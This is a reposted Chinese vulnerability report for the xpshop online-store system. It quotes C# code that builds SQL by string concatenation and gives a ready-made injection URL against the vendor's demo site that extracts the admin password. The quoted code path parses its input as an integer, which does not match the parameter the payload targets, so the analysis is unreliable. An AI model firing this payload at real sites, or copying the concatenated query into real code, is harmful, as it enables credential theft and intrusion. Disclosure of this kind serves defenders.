IT博客汇 | xpshop网店系统sql注入(demo演示)

xpshop网店系统sql注入(demo演示)

没穿底裤发表于 2016-02-16 15:47:44

漏洞作者：不能忍

详细说明：

漏洞位置:xpshop.webui.MyRefund

protected void Page_Load(object sender, EventArgs e)
		{
			if (Utils.request(base.Request.QueryString["type"]) &amp;&amp; Utils.request(base.Request.QueryString["Action"]))
			{
				string text = base.Request.QueryString["Action"];
				if (text != null)
				{
					if (!(text == "GetImg"))
					{
						if (text == "GetPackageGID")
						{
							base.Response.Write(new ProductDB().GetPackagePdtGID(int.Parse(base.Request.QueryString["PackagePID"])));
						}
					}
					else
					{
						this.GetImg(base.Request.QueryString["pids"]);
					}

跟进函数GetPackagePdtGID：

public int GetPackagePdtGID(int productID)

		{

			object obj = XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, "select GoodsID from Goods where ProductID = " + productID, null);

			return (obj != null) ? ((int)obj) : 0;

		}

没过滤直接进库，直接回显的!

payload:

http://clothes.xpshop.cn/preview.aspx?type=1&Action=GetImg&pids=1 and 1=(select top 1 password from admin)–

漏洞证明：

http://clothes.xpshop.cn/preview.aspx?type=1&Action=GetImg&pids=1 and 1=(select top 1 password from admin)–

xpshop网店系统sql注入(demo演示)

漏洞作者： 不能忍

详细说明：

漏洞证明：

漏洞作者：不能忍